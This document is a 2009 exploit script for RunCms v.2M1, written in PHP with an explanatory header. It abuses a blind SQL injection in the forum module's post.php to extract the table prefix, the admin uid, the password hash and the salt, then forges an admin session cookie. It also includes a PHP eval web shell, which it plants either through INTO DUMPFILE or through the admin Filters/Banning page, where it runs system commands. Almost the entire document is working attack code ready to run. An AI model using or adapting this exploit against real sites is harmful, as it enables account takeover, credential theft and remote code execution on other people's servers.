RunCms v.2M1 /modules/forum/post.php - 'forum' remote semi-blind SQL Injection Exploit
Source: http://retrogod.altervista.org/ Author: bookoo Published: 2009-10-27
<?php
/*
RunCms v.2M1 /modules/forum/post.php - 'forum' remote semi-blind SQL Injection Exploit
by Nine:Situations:Group::bookoo
site: http://retrogod.altervista.org/

software site: http://www.runcms.org/

vulnerable code in /modules/forum/post.php near lines 16-34:

...
if ( empty($_POST['forum']) ) {
    redirect_header("index.php", 2, _MD_ERRORFORUM);
    exit();
} else if ( empty($_POST['message']) ) {
    redirect_header("javascript:history.go(-1)", 2, _MD_ERRORMESSAGE);
    exit();
} else {
    $sql = "SELECT * FROM ".$bbTable['forums']." WHERE forum_id = ".$_POST['forum'].""; // <-------- !!!
    if (!$result = $db->query($sql)) {
        redirect_header("index.php", 2, _MD_CANTGETFORUM);
        exit();
    }
...

The 'forum' value is taken from the $_POST[] array and inserted into a SQL
query without prior sanitization and without being surrounded by quotes.
You can then manipulate a second query, in
/modules/forum/class/class.permissions.php, by passing another 'UNION SELECT'
as the first column of the 'UNION SELECT' sent to post.php (a little bit
complex, uh? $forum_id is user controlled ...), lines 100-102:

...
if ($user_id > 0) {
    $sql = "SELECT * FROM ".$bbTable['forum_access']." WHERE forum_id=$forum_id AND user_id=$user_id";
...

The result is that you can extract the sha1 hash of the admin user and the
corresponding salt. If you cannot crack the hash you can still hijack an
active session (meaning the admin user must be logged in) by building the
admin cookie: there is no check, e.g., on the IP address. To do that you need
the table prefix. There is no default one, but the installer suggests
'runcms', and an empty prefix is not allowed. With MySQL 5.0 you can recover
the table prefix by querying information_schema.TABLES.

This whole thing works regardless of php.ini settings (the payloads carry
strings as 0x hex literals, so no quote characters are needed), but you need:
- a valid user account (register!)
- an existing row in the [prefix]_forum_forums table
- an existing row in the [prefix]_forum_forum_access table
which is very likely on a RunCms installation with a working, active forum.

You could also manipulate the query in post.php to export a PHP shell with
'INTO DUMPFILE', but that needs the MySQL FILE privilege and magic_quotes_gpc = off.

It is also possible to disclose the absolute path under certain conditions
(see error_reporting) by polluting a preg_match() argument:
http://[host]/[path_to_runcms]/modules/contact/index.php?op[]=1
http://[host]/[path_to_runcms]/userinfo.php?uid[]=1

Final notes: this SQL injection vulnerability has to be considered high risk
because as ADMIN you can inject PHP code through the Filters/Banning
functionality, e.g.: click 'Administration Menu', then 'System Admin', then
the Filters/Banning icon, then 'Prohibited: Emails'. You can now edit the
/modules/system/cache/bademails.php file. Type in:

<?php eval($_GET[c]);?>

then launch commands:
http://[host]/[path_to_runcms]/modules/system/cache/bademails.php?c=system(dir);

You can do the same with all the filter utilities ...
*/

$err[0] = "[!] This script is intended to be launched from the cli!";
$err[1] = "[!] You need the curl extension loaded!";

function my_header() {
    // banner (the original stored it as a "\x.." hex string; decoded here)
    print("RunCms v.2m1 /modules/forum/post.php - 'forum' remote semi-blind SQL Injection Exploit \r\n".
          "by Nine:Situations:Group::bookoo\r\n".
          "site: http://retrogod.altervista.org/\r\n\n");
}
my_header();

if (php_sapi_name() <> "cli") { die($err[0]); }

if (!extension_loaded('curl')) {
    $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
    if ($win) {
        !dl("php_curl.dll") ? die($err[1]) : print("[*] curl loaded\n");
    } else {
        !dl("php_curl.so") ? die($err[1]) : print("[*] curl loaded\n");
    }
}

function syntax() {
    global $argv;  // the original used $argv here without declaring it global, so the script name printed empty
    print ("Syntax: php ".$argv[0]." [host] [path] [user] [pass] [OPTIONS] \n".
           "Options: \n".
           "--port:[port] - specify a port \n".
           " default->80 \n".
           "--prefix - try to extract table prefix from information_schema \n".
           " default->runcms \n".
           "--proxy:[host:port] - use proxy \n".
           "--skiptest - skip preliminary tests \n".
           "--test - run only tests \n".
           "--export_shell:[path] - try to export a shell with INTO DUMPFILE, needs Mysql\n".
           " FILE privilege \n".
           "Examples: php ".$argv[0]." 192.168.0.1 /runcms/ bookoo pass \n".
           " php ".$argv[0]." 192.168.0.1 / bookoo pass --prefix --proxy:1.1.1.1:8080 \n".
           " php ".$argv[0]." 192.168.0.1 / bookoo pass --prefix --export_shell:/var/www\n");
    die();
}

error_reporting(E_ALL ^ E_NOTICE);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];
$prefix = "runcms";
$argv[4] ? print("[*] Attacking...\n") : syntax();

$f_prefix = false;
$use_proxy = false;
$port = 80;
$skiptest = false;
$test = false;
$into_outfile = false;

for ($i = 3; $i < $argc; $i++) {
    if (stristr($argv[$i], "--prefix")) { $f_prefix = true; }
    if (stristr($argv[$i], "--proxy:")) {
        $use_proxy = true;
        $tmp = explode(":", $argv[$i]);
        $proxy_host = $tmp[1];
        $proxy_port = (int)$tmp[2];
    }
    if (stristr($argv[$i], "--port:")) {
        $tmp = explode(":", $argv[$i]);
        $port = (int)$tmp[1];
    }
    if (stristr($argv[$i], "--skiptest")) { $skiptest = true; }
    if (stristr($argv[$i], "--test")) { $test = true; }
    if (stristr($argv[$i], "--export_shell:")) {
        $tmp = explode(":", $argv[$i]);
        $my_path = $tmp[1];
        $into_outfile = true;
    }
}

// one HTTP request through curl; returns headers + body
function _s($url, $is_post, $ck, $request) {
    global $use_proxy, $proxy_host, $proxy_port;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    if ($is_post) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n");
    }
    curl_setopt($ch, CURLOPT_HEADER, 1);
    $cookies = array("Cookie: ".$ck);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $cookies);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1");
    curl_setopt($ch, CURLOPT_TIMEOUT, 0);
    if ($use_proxy) {
        curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
    }
    $d = curl_exec($ch);
    if (curl_errno($ch)) {
        die("[!] ".curl_error($ch)."\n");
    } else {
        curl_close($ch);
    }
    return $d;
}

// encode a string as a MySQL 0x... hex literal: no quote characters, so magic_quotes_gpc is irrelevant
function my_encode($str) {
    $out = "0x";
    for ($i = 0; $i < strlen($str); $i++) {
        $out .= sprintf("%02x", ord($str[$i]));  // always two digits per byte (the original used dechex())
    }
    return $out;
}

// recover the table prefix from information_schema (MySQL >= 5.0)
function find_prefix() {
    global $host, $port, $path, $url, $ck;
    $tn = "TABLE_NAME";
    $ift = "information_schema.TABLES";
    $table_prefix = "";
    // preliminary check: can we select from information_schema at all?
    $sql = "-99999 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM $ift";
    $sql = urlencode($sql);
    $out = _s($url, 1, $ck, "message=1&forum=$sql&");
    if (chk_err_ii($out)) {
        die("[!] $ift not available.");
    } else {
        print "[*] Initiating table prefix extraction...\n";
    }
    // step 1: length of the table name matching '%_forum_forum_group_access'
    // (0x255f66...7373 below), one decimal digit per request, NUL terminated
    $c = array(0);
    $c = array_merge($c, range(0x30, 0x39));
    $j = 1;
    $len = "";
    print ("[*] Table name length: ");
    while (!stripos ($len, "\x00")) {
        for ($i = 0; $i <= 0xff; $i++) {
            $f = false;
            if (in_array($i, $c)) {
                // inner query, hex-encoded: it becomes $forum_id in class.permissions.php
                $enc = my_encode("-999999 UNION SELECT 0,0,1,(CASE WHEN (ASCII(SUBSTR(LENGTH($tn) FROM $j FOR 1))=$i) THEN 1 ELSE 0 END),0,0,0,0,0,0,0,0 FROM $ift WHERE $tn LIKE 0x255f666f72756d5f666f72756d5f67726f75705f616363657373 LIMIT 1 --");
                $sql = "-99999 UNION SELECT $enc,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM $ift";
                $sql = urlencode($sql);
                $out = _s($url, 1, $ck, "message=1&forum=$sql&");
                if (chk_err($out)) {
                    $f = true;
                    $len .= chr($i);
                    print chr($i);
                    break;
                }
            }
        }
        if ($f == false) { die("\n[!] Unknown error ..."); }
        $j++;
    }
    $len = (int)$len - 25;   // strlen('_forum_forum_group_access') == 25
    print ("\n[*] Prefix length: ".$len."\n");
    // step 2: the prefix itself, one printable character per position
    $c = array(0);
    $c = array_merge($c, range(0x21, 0x7E));
    $j = 1;
    $table_prefix = "";
    print ("[*] Table prefix: ");
    while ((!stripos ($table_prefix, "\x00")) and (!(strlen($table_prefix) == $len))) {
        for ($i = 0; $i <= 0xff; $i++) {
            $f = false;
            if (in_array($i, $c)) {
                $enc = my_encode("-999999 UNION SELECT 0,0,1,(CASE WHEN (ASCII(SUBSTR($tn FROM $j FOR 1))=$i) THEN 1 ELSE 0 END),0,0,0,0,0,0,0,0 FROM $ift WHERE $tn LIKE 0x255f666f72756d5f666f72756d5f67726f75705f616363657373 LIMIT 1 --");
                $sql = "-99999 UNION SELECT $enc,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM $ift";
                $sql = urlencode($sql);
                $out = _s($url, 1, $ck, "message=1&forum=$sql&");
                if (chk_err($out)) {
                    $f = true;
                    $table_prefix .= chr($i);
                    print chr($i);
                    break;
                }
            }
        }
        if ($f == false) { die("\n[!] Unknown error ..."); }
        $j++;
    }
    return $table_prefix;
}

// write a PHP shell with INTO DUMPFILE (needs the MySQL FILE privilege and magic_quotes_gpc = off)
function export_sh() {
    global $url, $prefix, $my_path, $ck;
    // change the php code if you want
    $enc = my_encode("<?php eval(\$_GET[c]);?>");
    // the hex encoding only hides the payload from the eye: INTO DUMPFILE itself needs single quotes around the path
    $sql = "-99999 UNION SELECT null,$enc,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null INTO DUMPFILE '".$my_path."/sh.php' FROM ".$prefix."_forum_forums";
    $sql = urlencode($sql);
    $o = _s($url, 1, $ck, "message=1&forum=$sql&");
    if (chk_err_ii($o)) {
        die("[!] mmm, failed!");
    } else {
        die("[*] Seems ok. Check the shell manually. Was it the right path?");
    }
}

// response fingerprints (the original stored them as "\x.." hex strings)
function chk_login($s) {
    if (stripos ($s, "Thank you for logging in")) { return true; } else { return false; }
}
// the semi-blind oracle: the database error shown when the CASE in the inner query yields 1
function chk_err($s) {
    if (stripos ($s, "while querying the database")) { return true; } else { return false; }
}
// post.php's own failure message ("Can't get forum data")
function chk_err_ii($s) {
    if (stripos ($s, "t get forum data")) { return true; } else { return false; }
}

// log in and collect the session cookies
$url = "http://$host:$port".$path."user.php";
$out = _s($url, 1, "", "uname=$user&pass=$pass&op=login&");
if (chk_login($out)) {
    print("[*] Logged in!\n");
} else {
    die("[!] Not logged in.");
}
$tmp = explode("Set-Cookie: ", $out);
$ck = "";
for ($i = 1; $i < count($tmp); $i++) {
    $ttmp = explode(" ", $tmp[$i]);
    $ck .= " ".$ttmp[0];
}
//echo "[*] Your cookie->".$ck."\n";

$url = "http://$host:$port".$path."modules/forum/post.php";

// preliminary test: a syntactically broken 'forum' value must make post.php fail with "Can't get forum data"
$sql = "1 1 1";
$sql = urlencode($sql);
if (!$skiptest) {
    $out = _s($url, 1, $ck, "message=1&forum=$sql&");
    if (chk_err_ii($out)) {
        print("[*] Vulnerable!\n");
    } else {
        die("[!] Not vulnerable.");
    }
}
if ($test) { die; }
if ($f_prefix == true) { $prefix = find_prefix(); }
if ($into_outfile == true) { export_sh(); }

// admin uid (level = 5), one decimal digit per request, NUL terminated (ASCII('') = 0 in MySQL)
$c = array(0);
$c = array_merge($c, range(0x30, 0x39));
$uid = "";
print ("\n[*] admin uid: ");
$j = 1;
while (!stripos ($uid, "\x00")) {
    for ($i = 0; $i <= 0xff; $i++) {
        $f = false;
        if (in_array($i, $c)) {
            $enc = my_encode("-999999 UNION SELECT 0,0,1,(CASE WHEN (ASCII(SUBSTR(uid FROM $j FOR 1))=$i) THEN 1 ELSE 0 END),0,0,0,0,0,0,0,0 FROM ".$prefix."_users WHERE level=5 LIMIT 1 --");
            $sql = "-99999 UNION SELECT $enc,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM ".$prefix."_forum_forums";
            $sql = urlencode($sql);
            $out = _s($url, 1, $ck, "message=1&forum=$sql&");
            if (chk_err($out)) {
                $f = true;
                $uid .= chr($i);
                print chr($i);
                break;
            }
        }
    }
    if ($f == false) { die("\n[!] Unknown error ..."); }
    $j++;
}
$uid = (int)$uid;

// sha1 password hash, then the salt: candidate alphabet is hex digits only
$c = array(0);
$c = array_merge($c, range(0x30, 0x39));
$c = array_merge($c, range(0x61, 0x66));
$hash = "";
print ("\n[*] Initiating hash extraction ...\n[*] pwd hash: ");
$j = 1;
while (!stripos ($hash, "\x00")) {
    for ($i = 0; $i <= 0xff; $i++) {
        $f = false;
        if (in_array($i, $c)) {
            $enc = my_encode("-999999 UNION SELECT 0,0,1,(CASE WHEN (ASCII(SUBSTR(pass FROM $j FOR 1))=$i) THEN 1 ELSE 0 END),0,0,0,0,0,0,0,0 FROM ".$prefix."_users WHERE uid=$uid LIMIT 1 --");
            $sql = "-99999 UNION SELECT $enc,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM ".$prefix."_forum_forums";
            $sql = urlencode($sql);
            $out = _s($url, 1, $ck, "message=1&forum=$sql&");
            if (chk_err($out)) {
                $f = true;
                $hash .= chr($i);
                print chr($i);
                break;
            }
        }
    }
    if ($f == false) { die("\n[!] Unknown error ..."); }
    $j++;
}

$salt = "";
print ("\n[*] salt: ");
$j = 1;
while (!stripos ($salt, "\x00")) {
    for ($i = 0; $i <= 0xff; $i++) {
        $f = false;
        if (in_array($i, $c)) {
            $enc = my_encode("-999999 UNION SELECT 0,0,1,(CASE WHEN (ASCII(SUBSTR(pwdsalt FROM $j FOR 1))=$i) THEN 1 ELSE 0 END),0,0,0,0,0,0,0,0 FROM ".$prefix."_users WHERE uid=$uid LIMIT 1 --");
            $sql = "-99999 UNION SELECT $enc,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM ".$prefix."_forum_forums";
            $sql = urlencode($sql);
            $out = _s($url, 1, $ck, "message=1&forum=$sql&");
            if (chk_err($out)) {
                $f = true;
                $salt .= chr($i);
                print chr($i);
                break;
            }
        }
    }
    if ($f == false) { die("\n[!] Unknown error ..."); }
    $j++;
}

// forge the session cookie: rc2_sess = urlencode(serialize(array(uid, sha1(hash.salt), expiry)))
print("\n[*] Admin cookie: rc2_sess=". urlencode(serialize(array($uid, sha1(trim($hash).trim($salt)), time()+ 2678400))).";");
?>